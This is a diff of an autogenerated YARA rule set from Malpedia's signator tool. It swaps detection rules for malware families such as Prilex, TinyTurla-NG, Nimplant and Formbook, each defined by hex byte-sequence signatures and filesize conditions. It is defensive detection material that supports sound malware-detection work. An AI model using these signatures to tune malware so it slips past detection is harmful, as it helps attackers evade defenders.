-		$sequence_9 = { ff742428 6810270000 57 55 53 e8???????? 8bd0 }
+		$sequence_0 = { c6857ff9ffff4b 8b45dc 898580f9ffff 8b45e0 66898584f9ffff c7858af9ffff00000000 }
+		$sequence_1 = { 0fb785b4fdffff 0fb7c0 8db5b4fdffff 81c607010000 89742414 8db5b4fdffff 83c606 }
+		$sequence_2 = { c70424e8030000 a1???????? ffd0 83ec04 b800000000 8d65f4 59 }
+		$sequence_3 = { 8d7600 8dbc2700000000 8b06 0fb65e08 8b4e04 8d9000004000 8b8000004000 }
+		$sequence_4 = { 83ea01 83fa05 7707 8b0c9598444000 dd4018 }
+		$sequence_5 = { 7408 83e840 83e0bf 7512 8305????????01 83c430 }
+		$sequence_6 = { 83c008 8b00 8d95a2f9ffff 89542420 8d95a4f9ffff }
+		$sequence_7 = { c7442414ffff0000 c744241000000000 8b55d4 8954240c c7442408???????? }
+		$sequence_8 = { e8???????? c7442404ccffffff c70424???????? e8???????? c7442404d1feffff }
+		$sequence_9 = { 8b442428 8d50fc 83e2fb 7408 83e840 }
 
 	condition:
-		7 of them and filesize < 892928
+		7 of them and filesize < 66560
 }
-rule MALPEDIA_Win_Prilex_Auto : FILE
+rule MALPEDIA_Win_Bangat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2ee73f8b-e8a7-530a-919c-0e8a3ae2ae98"
+		id = "e21234e1-ab1b-5ed7-845e-28d0f46bef68"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.prilex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.prilex_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bangat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bangat_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "6de539b63b8562d1b8bdbaceab1132bb64a8bf2aa0cf4524ffc6127b96beab6c"
+		logic_hash = "527e6766d19f3aa2fef4247d1ea1a8fda60b88b70c01d8ada16ce4d5757a0e35"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131596,32 +132075,32 @@ rule MALPEDIA_Win_Prilex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 2b4814 898de8feffff 8b55ac 8b85e8feffff 3b4210 730c }
-		$sequence_1 = { 8b45a0 8985b4feffff c745a000000000 8b8db4feffff 898d54ffffff }
-		$sequence_2 = { 6aff 52 895dbc e8???????? ffd6 }
-		$sequence_3 = { 0f8097000000 50 6a01 6a03 51 6a04 }
-		$sequence_4 = { 7405 e9???????? c745fc15000000 6a00 }
-		$sequence_5 = { 897db0 ff15???????? 50 8d45d8 50 ff15???????? 8bf0 }
-		$sequence_6 = { e8???????? 8bf8 ff15???????? 8d55d4 }
-		$sequence_7 = { 52 ff15???????? 50 8b4508 8b08 51 57 }
-		$sequence_8 = { ffd6 50 8d4da0 68???????? 51 ffd6 }
-		$sequence_9 = { ff15???????? 8b4d08 8b35???????? b808000000 }
+		$sequence_0 = { 59 33c0 8dbdf1fdffff ff7508 f3ab 8365fc00 66ab }
+		$sequence_1 = { 50 ff75ec e8???????? 83c40c 83f8ff 74b4 85c0 }
+		$sequence_2 = { ffd7 56 ffd7 59 59 5f 5e }
+		$sequence_3 = { 7413 3c5f 7405 345e aa ebf2 }
+		$sequence_4 = { 6800000040 50 e8???????? 83c43c 83f8ff 8945ec 7511 }
+		$sequence_5 = { 817dfc01040000 7513 68???????? ff75f8 e8???????? 59 }
+		$sequence_6 = { e8???????? 68ad030000 68???????? 6888000000 6a6e e9???????? 8b453c }
+		$sequence_7 = { b800080000 33db 57 66394608 8b3d???????? 7516 833e01 }
+		$sequence_8 = { 81eca8030000 53 56 33db 6a40 8d45b0 53 }
+		$sequence_9 = { 53 53 6a01 53 8d8588feffff 53 50 }
 
 	condition:
-		7 of them and filesize < 450560
+		7 of them and filesize < 1228800
 }
-rule MALPEDIA_Win_Tinyturla_Ng_Auto : FILE
+rule MALPEDIA_Win_Harnig_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0e7d5cbc-4d8e-5d08-97c6-9c50d3154da3"
+		id = "2adef0b1-84b8-5d38-81de-8e96334fdf2c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyturla_ng"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tinyturla_ng_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.harnig"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.harnig_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "c4bc20a25d7b1bca8938e309f5cad122284666710845f9d27ecb23d7dbbc9d43"
+		logic_hash = "6b0da0575293c2afced8a49894e42bab87f6771cbe3d56035db53ed07d7267fe"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131635,32 +132114,32 @@ rule MALPEDIA_Win_Tinyturla_Ng_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f118090000000 8b81a0000000 418980a0000000 0fb781a4000000 66418980a4000000 4188b8a6000000 4c89442420 }
-		$sequence_1 = { 48897570 4c897578 c6456000 eb0d 488b5d40 41be0f000000 4032ff }
-		$sequence_2 = { 498bdd 492bdc 48c1fb05 488bd3 488d4c2460 e8???????? 488bf8 }
-		$sequence_3 = { 0f114510 c745c068000000 c745fc00010000 488b442460 48894520 48894518 488b442468 }
-		$sequence_4 = { 837c243800 7474 e8???????? 39442438 7474 0f28442430 660f7f442440 }
-		$sequence_5 = { 488bce e8???????? b001 488b4df0 4833cc e8???????? }
-		$sequence_6 = { e8???????? 84c0 0f8450010000 498d4d08 e8???????? 33f6 e9???????? }
-		$sequence_7 = { 48b82700000000000080 eb27 4883fb16 b816000000 480f42d8 488d4b01 }
-		$sequence_8 = { e8???????? 488b45f0 4883f810 7232 488d5001 488b4dd8 488bc1 }
-		$sequence_9 = { 7734 498bc8 e8???????? 4c8933 48c1e605 4903f6 }
+		$sequence_0 = { ffd7 6a21 56 68???????? e8???????? 56 }
+		$sequence_1 = { c9 c20800 55 8bec 83ec54 57 6a10 }
+		$sequence_2 = { ff74240c 0fb674240c 6a02 e8???????? 6a08 }
+		$sequence_3 = { 59 68c78a3146 33c0 c745ac44000000 }
+		$sequence_4 = { 837dfc00 8d85e0fcffff 7406 8d85e0fbffff 50 8d85e0fdffff 50 }
+		$sequence_5 = { 81ec18080000 53 56 57 ba00010000 33c0 }
+		$sequence_6 = { 50 8d85e0fdffff 50 ffd7 6a04 56 }
+		$sequence_7 = { 0f845d020000 895dfc 8b1d???????? 837dfc00 8d85e0fcffff 7406 }
+		$sequence_8 = { 6a04 8d4df8 51 6a05 ff750c ffd0 bf6229211a }
+		$sequence_9 = { 6a04 c745c03c000000 897dc8 c745cc6c104000 8945d4 897dd8 }
 
 	condition:
-		7 of them and filesize < 635904
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Firechili_Auto : FILE
+rule MALPEDIA_Win_Rising_Sun_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "559e09c8-5cc7-5636-8b29-09d353ae6b28"
+		id = "e7041472-db64-5ca5-926c-a3eb0b3a9cad"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.firechili"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.firechili_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rising_sun"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rising_sun_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "c22cf39b407e9812d354a7c986ef996dc279b9f043abb338a1580b523e11c3e8"
+		logic_hash = "7e3e464c1a03d1cb6ef88adda73a2c17dabfe5f93751654747dc236b8a8e7509"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131674,32 +132153,32 @@ rule MALPEDIA_Win_Firechili_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 488d6c24b1 4881ec98000000 48894d17 4c8d4507 }
-		$sequence_1 = { 4885c0 745a 483bc3 7455 }
-		$sequence_2 = { 0f114fb0 0f1043c0 0f1147c0 0f104bd0 0f114fd0 0f1043e0 0f1147e0 }
-		$sequence_3 = { 4c8d4507 4889450f 488d4d7f 488d45f7 48897c2430 0f57c0 897c2428 }
-		$sequence_4 = { 7c6c 488b4840 4885c9 742d f6410a05 7406 488b4118 }
-		$sequence_5 = { e8???????? 488b7c2428 0fb6f0 4885ff 744f }
-		$sequence_6 = { 664585db 750c 410fb7d0 488bcb 48d1ea eb05 b80d0000c0 }
-		$sequence_7 = { 3c02 773d ff05???????? 488d0da7490000 ff15???????? }
-		$sequence_8 = { 0f8420010000 4883feff 0f840d010000 488d8424a0000000 48895c2428 4533c9 }
-		$sequence_9 = { 488d0d7d490000 ff15???????? 488b7c2430 33c0 48894308 }
+		$sequence_0 = { 488b8a48000000 4883c138 e9???????? 488b8a48000000 4883c160 e9???????? }
+		$sequence_1 = { 44886c2440 488d8db8000000 4883bdd000000008 480f438db8000000 bf03000000 4c8b85c8000000 4c3bc7 }
+		$sequence_2 = { 4533c9 4533d2 488bd9 4963f8 }
+		$sequence_3 = { 488b8d10030000 4833cc e8???????? 4c8d9c2420040000 498b5b28 498b7330 498b7b38 }
+		$sequence_4 = { 0f8498feffff 488d5506 488bcb ff15???????? 488905???????? 4885c0 0f847bfeffff }
+		$sequence_5 = { 4181f9000000c0 7532 4585d2 756e 488d4b04 4c8d059e520000 418d5216 }
+		$sequence_6 = { 4883ec20 33c0 48c7411807000000 488d15a97d0200 48894110 4983c9ff 4533c0 }
+		$sequence_7 = { c78534590000c1ba3099 c785385900002c7b2848 c7853c590000a1d91b85 c78540590000ea4058b5 c78544590000e6ecbf88 66c7854859000094a8 e8???????? }
+		$sequence_8 = { e9???????? 488bcd e8???????? 48ffc3 4c8be8 e9???????? 48ff4548 }
+		$sequence_9 = { c744246c3ffbe9ea c7442470f94bc72d c7442474d9ec5e31 c7442478b1fab2fb c744247c3ecc0cc2 c74580af6c9d01 c74584614a63ca }
 
 	condition:
-		7 of them and filesize < 91136
+		7 of them and filesize < 409600
 }
-rule MALPEDIA_Win_Ghost_Secret_Auto : FILE
+rule MALPEDIA_Win_Gtpdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "aa96bf29-3993-5fcb-89d9-e0ea92c3a3df"
+		id = "4153c400-4ed4-5abe-992b-68d9e6f8d150"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_secret"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ghost_secret_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gtpdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gtpdoor_auto.yar#L1-L153"
 		license_url = "N/A"
-		logic_hash = "c0493088659adfee49574a5acb9764a23e419d0406508dff35abe1e75e13521d"
+		logic_hash = "423cce46146e2125cb44be14d40c52df5a3a2bf5fc0d9812eac79f63ac677cea"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131713,32 +132192,36 @@ rule MALPEDIA_Win_Ghost_Secret_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c684244a04000036 c684244b040000e2 c684244c04000057 c684244d04000049 c684244e0400002c c684244f040000f6 c684245004000070 }
-		$sequence_1 = { 85c0 59 0f8547010000 837e5816 740a b80088ffff }
-		$sequence_2 = { c684245b040000ec c684245c04000067 c684245d04000052 c684245e04000007 c684245f040000f0 c684246004000070 c684246104000065 }
-		$sequence_3 = { 55 ff15???????? 8b942450020000 52 e8???????? 8b8c2454020000 8be8 }
-		$sequence_4 = { c1e208 0fb69bc4f04100 33d3 33db 8a5df2 3316 0fb69bc4f04100 }
-		$sequence_5 = { ff7648 e8???????? 57 55 ff766c e8???????? }
-		$sequence_6 = { 8bf0 85f6 741f 8d842434040000 6a10 50 }
-		$sequence_7 = { c684244b05000059 c684244c05000013 c684244d050000b9 c684244e050000f3 888c244f050000 c684245005000046 }
-		$sequence_8 = { 331c8dc4d34100 59 331c85c4db4100 8b45f8 23c7 331c85c4cf4100 331e }
-		$sequence_9 = { c644245d25 c644245e60 c644245f55 c6442460d5 c64424615a c644246232 884c2467 }
+		$sequence_0 = { fc b932000000 b800000000 f3aa }
+		$sequence_1 = { 0fb600 31d0 8801 8045fb01 8345fc01 }
+		$sequence_2 = { e8???????? 8945c8 837dc8ff 7528 e8???????? 8b38 e8???????? }
+		$sequence_3 = { 8945f4 8d950afaffff b8dc050000 89442408 c744240400000000 891424 e8???????? }
+		$sequence_4 = { fc 488bbda0f1ffff f2ae 4889c8 48f7d0 }
+		$sequence_5 = { 55 48833d????????00 4889e5 7416 b800000000 4885c0 740c }
+		$sequence_6 = { a3???????? a1???????? c744240800000000 c744240400000000 890424 }
+		$sequence_7 = { 0fb64009 3c01 757b 8b45e8 83c00c }
+		$sequence_8 = { f7d0 8d50ff 8b45e8 83c00c bf???????? }
+		$sequence_9 = { c9 c3 55 4889e5 48897de8 488955d8 4c8945c8 }
+		$sequence_10 = { 8b7dd4 f2ae 89c8 f7d0 83e801 83c001 }
+		$sequence_11 = { 8b450c 8945ea c645ee00 0fb68504faffff }
+		$sequence_12 = { 4c89c9 e8???????? 8945fc 8b75fc bf???????? b800000000 }
+		$sequence_13 = { 4889c2 480355e0 0fb645ff 8802 }
 
 	condition:
-		7 of them and filesize < 278528
+		7 of them and filesize < 4210688
 }
-rule MALPEDIA_Win_Sparrow_Door_Auto : FILE
+rule MALPEDIA_Win_Bitsran_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2a622c79-b97a-50d2-8520-df68de9886c5"
+		id = "704b65b3-af59-52e9-9dfb-e042a4dda0d0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sparrow_door"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sparrow_door_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bitsran_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "9af3d65106033b3806f02bea374bf6db582af3aecda2d52e70b68fd5a5b6e2c8"
+		logic_hash = "e79bcb054b07fb9e07c55e5ca091a76d8b3025c95f8242bfc1e649f657a93d3b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131752,32 +132235,32 @@ rule MALPEDIA_Win_Sparrow_Door_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 e8???????? 33c0 8d4c242c }
-		$sequence_1 = { 51 53 57 6a40 6800100000 6800100000 6a00 }
-		$sequence_2 = { 50 8d742e08 53 e8???????? 8b442448 83c43c 85c0 }
-		$sequence_3 = { ebb3 55 e8???????? 8b44241c 83c404 50 }
-		$sequence_4 = { 89542434 8b9424e8200000 8d442449 56 33db 50 894c2444 }
-		$sequence_5 = { 8d442f08 50 e8???????? 33c0 8d4c242c }
-		$sequence_6 = { 53 6a00 6a00 ff15???????? 8b4c2418 8b542414 6a00 }
-		$sequence_7 = { 53 6a01 53 53 8d8c2498000000 }
-		$sequence_8 = { 50 889c2448020000 e8???????? 83c40c }
-		$sequence_9 = { 896c2464 e8???????? 83c43c 85c0 752e 837c242464 }
+		$sequence_0 = { 8d89140c4200 5a 668b31 668930 83c102 83c002 }
+		$sequence_1 = { c686c800000043 c6864b01000043 c74668e0074200 6a0d e8???????? 59 }
+		$sequence_2 = { 53 8d85f4fdffff 50 8db744020000 }
+		$sequence_3 = { 395910 7cac 8b7514 8d95bcf9ffff 52 53 }
+		$sequence_4 = { 85c0 0f8584000000 6806020000 50 8d8deafaffff 51 668985e8faffff }
+		$sequence_5 = { 57 8d45ec 50 8d8decfbffff }
+		$sequence_6 = { c745fc99ffffff 83ceff 8b0b 8d45a8 50 51 e8???????? }
+		$sequence_7 = { 68???????? 50 898df8feffff 8995fcfeffff e8???????? 8bf0 }
+		$sequence_8 = { 68???????? 8d8decf3ffff 68???????? 51 }
+		$sequence_9 = { 3b7804 0f8daa050000 837e04ff 7409 }
 
 	condition:
-		7 of them and filesize < 155648
+		7 of them and filesize < 344064
 }
-rule MALPEDIA_Win_Aurora_Auto : FILE
+rule MALPEDIA_Win_Nexster_Bot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "db71bfec-d16f-5b65-a2de-3646c8fc9579"
+		id = "f3849f7f-92fa-5a27-8fce-5cf70a6092f1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.aurora_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexster_bot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nexster_bot_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "59e6b8275e1925f874147250deaf1189e73e34e27743f50bcfcc60f5d60b4760"
+		logic_hash = "68d99297d7676950ef20645c2f54f180e697aada925cf75041287d48b2b4b344"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131791,32 +132274,71 @@ rule MALPEDIA_Win_Aurora_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 8d4de4 c745d801000000 c745e0ffffffff }
-		$sequence_1 = { 8855cc 33f6 8a55d2 8aca }
-		$sequence_2 = { 8d8dd4efffff c785e8efffff0f000000 c785e4efffff00000000 c685d4efffff00 e8???????? }
-		$sequence_3 = { 85c0 0f850affffff 85db 0f849b000000 8bc3 83fb04 }
-		$sequence_4 = { 6a02 68???????? 8d8de4eeffff c785f8eeffff0f000000 c785f4eeffff00000000 c685e4eeffff00 e8???????? }
-		$sequence_5 = { 68???????? 8d8de4f1ffff c785f8f1ffff0f000000 c785f4f1ffff00000000 c685e4f1ffff00 e8???????? }
-		$sequence_6 = { c78550f1ffff0f000000 c7854cf1ffff00000000 c6853cf1ffff00 e8???????? 8d8d54f1ffff }
-		$sequence_7 = { e8???????? 6a04 68???????? 8d8d44efffff c78558efffff0f000000 c78554efffff00000000 c68544efffff00 }
-		$sequence_8 = { e8???????? 8bd0 c745d407000000 33c0 c745d000000000 83c404 668945c0 }
-		$sequence_9 = { 8b06 8b4804 8b44310c 85c0 0f9445f0 c745fc01000000 a806 }
+		$sequence_0 = { 52 e8???????? 68ff030000 8d85bd090000 }
+		$sequence_1 = { ff15???????? 668985ae010000 6a10 8d85ac010000 50 57 }
+		$sequence_2 = { 7d10 668b4c4310 66890c45186e4100 40 ebe8 33c0 }
+		$sequence_3 = { 03f9 837d1810 7208 8b5d04 }
+		$sequence_4 = { 33c0 8da42400000000 8a1485d0604100 889405000e0000 40 83f80b }
+		$sequence_5 = { 731a 8bc8 83e01f c1f905 8b0c8d20804100 c1e006 03c1 }
+		$sequence_6 = { 81c404040000 c3 53 56 57 8bf8 }
+		$sequence_7 = { 66898c24bc010000 e9???????? 8b15???????? a1???????? 8b0d???????? 899424b0010000 }
+		$sequence_8 = { 68???????? 52 e8???????? 68???????? 8d85bc110000 50 }
+		$sequence_9 = { 8a08 40 84c9 75f9 8dbdbc150000 2bc6 4f }
 
 	condition:
-		7 of them and filesize < 827392
+		7 of them and filesize < 245760
 }
-rule MALPEDIA_Win_Gcleaner_Auto : FILE
+rule MALPEDIA_Win_Cerbu_Miner_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f3bfcb33-d9d5-58c8-b732-fae47caf5ec8"
+		id = "77652d6a-745f-5552-8901-83bf555706f4"
+		date = "2023-12-06"
+		modified = "2023-12-08"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerbu_miner"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cerbu_miner_auto.yar#L1-L134"
+		license_url = "N/A"
+		logic_hash = "e4927a587588bc11053fcbade5bb9500364c9a656d383eb318cc8486464f3cce"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		version = "1"
+		tool = "yara-signator v0.6.0"
+		signator_config = "callsandjumps;datarefs;binvalue"
+		malpedia_rule_date = "20231130"
+		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
+		malpedia_version = "20230808"
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { 88b42480000000 eb3f 83e902 7433 83e904 7413 83e909 }
+		$sequence_1 = { 7412 48 8d0d0b360500 48 83c428 48 ff25???????? }
+		$sequence_2 = { 8d4601 c643012e 48 63c8 41 8d4602 48 }
+		$sequence_3 = { 85d2 7427 85c9 b800040000 41 b800080000 44 }
+		$sequence_4 = { f6473801 7402 eb18 48 8bcf ff15???????? f6473801 }
+		$sequence_5 = { e9???????? 45 8bfd 44 89ad50010000 e9???????? 44 }
+		$sequence_6 = { 48 89442420 e8???????? 48 8bd7 48 8bcb }
+		$sequence_7 = { 89b42418010000 8b74242c 83feff 7515 837f0c00 7c0f 48 }
+		$sequence_8 = { 8d057b52f9ff 48 894518 c745b0e6070000 48 c745c000000200 48 }
+		$sequence_9 = { 44 2bc0 44 8903 33c0 48 8b5c2438 }
+
+	condition:
+		7 of them and filesize < 1040384
+}
+rule MALPEDIA_Win_Racket_Auto : FILE
+{
+	meta:
+		description = "autogenerated rule brought to you by yara-signator"
+		author = "Felix Bilstein - yara-signator at cocacoding dot com"
+		id = "fdbc67f2-dd9c-564f-803b-5a571eceba53"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcleaner"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gcleaner_auto.yar#L1-L110"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.racket"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.racket_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "46f1f4e86df7721d1ed8e6509c63180bfe445457c94a26b5c8b0a0ee89dd2952"
+		logic_hash = "8c447bff92b42700b626fab2f15edaccf604f14572851cce781a5a45ae5fbde2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131830,32 +132352,32 @@ rule MALPEDIA_Win_Gcleaner_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bd0 c645fc04 8d4dd8 e8???????? 83c410 }
-		$sequence_1 = { c645fc02 8d4da8 e8???????? 57 }
-		$sequence_2 = { 8035????????2e 8035????????2e 8035????????2e 342e }
-		$sequence_3 = { 6800004080 6a00 6a00 6a00 }
-		$sequence_4 = { 89b5f4feffff ff15???????? 8bf8 85ff }
-		$sequence_5 = { 5e c9 c3 53 ff7518 }
-		$sequence_6 = { 7404 2bfb eb03 83cfff 3bf7 }
-		$sequence_7 = { 8035????????2e 8035????????2e 342e a2???????? }
-		$sequence_8 = { 6a04 8d85f0feffff 50 56 }
-		$sequence_9 = { 8d8d60ffffff e8???????? 6a00 6a00 8d4dd8 e8???????? 50 }
+		$sequence_0 = { 757b e8???????? 3906 7572 837e0c00 756c 8b4608 }
+		$sequence_1 = { 7507 c74634f4af0510 6a00 57 8bce e8???????? 5f }
+		$sequence_2 = { e8???????? 8b5590 8b4d8c 8bbd70ffffff 83c104 83ea01 894d8c }
+		$sequence_3 = { e8???????? 83c40c 8d8ddcfaffff 68???????? e8???????? 6804010000 8d85e0fbffff }
+		$sequence_4 = { 8b9568ffffff 8b4214 394218 7420 8b4dac 8908 c7400400000000 }
+		$sequence_5 = { 50 e8???????? 6a00 8d8558f6ffff 50 6aff 8d855cf6ffff }
+		$sequence_6 = { 8b4da4 eb03 8b45e0 837dc400 893488 745c 8b45f4 }
+		$sequence_7 = { 660f56c3 660f58e0 660fc5c400 25f0070000 660f28a050f70510 660f28b840f30510 660f54f0 }
+		$sequence_8 = { 56 e8???????? e8???????? 6a00 ffb5c8feffff 56 e8???????? }
+		$sequence_9 = { 8bd0 8b37 2bd6 8b4d0c 8945e0 b8ffa16f6b f7ea }
 
 	condition:
-		7 of them and filesize < 540672
+		7 of them and filesize < 985088
 }
-rule MALPEDIA_Win_Scieron_Auto : FILE
+rule MALPEDIA_Win_Nimplant_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1a215415-1cbd-5509-a833-0e80720c59be"
+		id = "ab9ad292-a36d-5023-b871-7d5dcf59a376"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scieron"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.scieron_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimplant"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nimplant_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "f3ffce1ac52929398289b6099b241833a19e91e706a019cc700fc14e11b03b2d"
+		logic_hash = "78100de3c1ed8ac731d4871e0295c4754b22f71e68f7be54c12e992f0adcf829"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131869,32 +132391,32 @@ rule MALPEDIA_Win_Scieron_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff742418 ff15???????? 85c0 0f8472020000 f686????????10 7415 }
-		$sequence_1 = { ffd0 85f6 0f8497010000 6800800000 8d44242c }
-		$sequence_2 = { 6800000080 83c008 50 ff15???????? 8bf8 }
-		$sequence_3 = { 72f0 33c0 663b45f0 7560 8a45f4 8b4d08 }
-		$sequence_4 = { 3bfd 7507 33c0 e9???????? 8b742418 6a0c 57 }
-		$sequence_5 = { e8???????? 8bf8 83c410 3bfe 0f841bffffff }
-		$sequence_6 = { 0f8401010000 6a04 8d4c2410 51 }
-		$sequence_7 = { 8bf8 3bfe 7419 8d4574 50 57 }
-		$sequence_8 = { 033e 68???????? 68???????? ff15???????? 50 ff15???????? ffd0 }
-		$sequence_9 = { ff15???????? 50 ff15???????? ffd0 83c61c }
+		$sequence_0 = { 53 4883ec30 4889cb 4885c9 7417 488b01 6683781201 }
+		$sequence_1 = { c644020800 4889842480000000 488b442440 803800 0f85e0faffff ba01000000 4c89f9 }
+		$sequence_2 = { e8???????? 803b00 0f842cceffff 0f1f8000000000 488b842428020000 48898424b0010000 48c744243000000000 }
+		$sequence_3 = { 488b8c24b0010000 e8???????? 803b00 0f853c010000 488b942450010000 4885d2 7413 }
+		$sequence_4 = { 660f1f440000 410fb63f 41c60700 4885f6 7413 48b80000000000000040 488506 }
+		$sequence_5 = { 4c8d0d69880500 4889c1 488b05???????? 4c8d056f880500 48895110 488901 488d05bf880500 }
+		$sequence_6 = { e8???????? 803b00 0f8515feffff 4885f6 7413 48b80000000000000040 488506 }
+		$sequence_7 = { e8???????? 803800 7561 488b03 488d0d2fde0900 480fbf7010 e8???????? }
+		$sequence_8 = { 4c8d7c2460 f3440f6f05???????? 4c8d742430 488b442478 4c89e6 4c89ea 4889e9 }
+		$sequence_9 = { 4c89f9 4c894c2420 e8???????? 803b00 4c8b4c2420 0f85bd010000 f30f6f15???????? }
 
 	condition:
-		7 of them and filesize < 100352
+		7 of them and filesize < 1811456
 }
-rule MALPEDIA_Win_Darkdew_Auto : FILE
+rule MALPEDIA_Win_Formbook_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "72766643-15c8-5d73-9055-fc2b6509a42d"
+		id = "241ced8d-1693-5841-a374-2686d8f6dbd5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
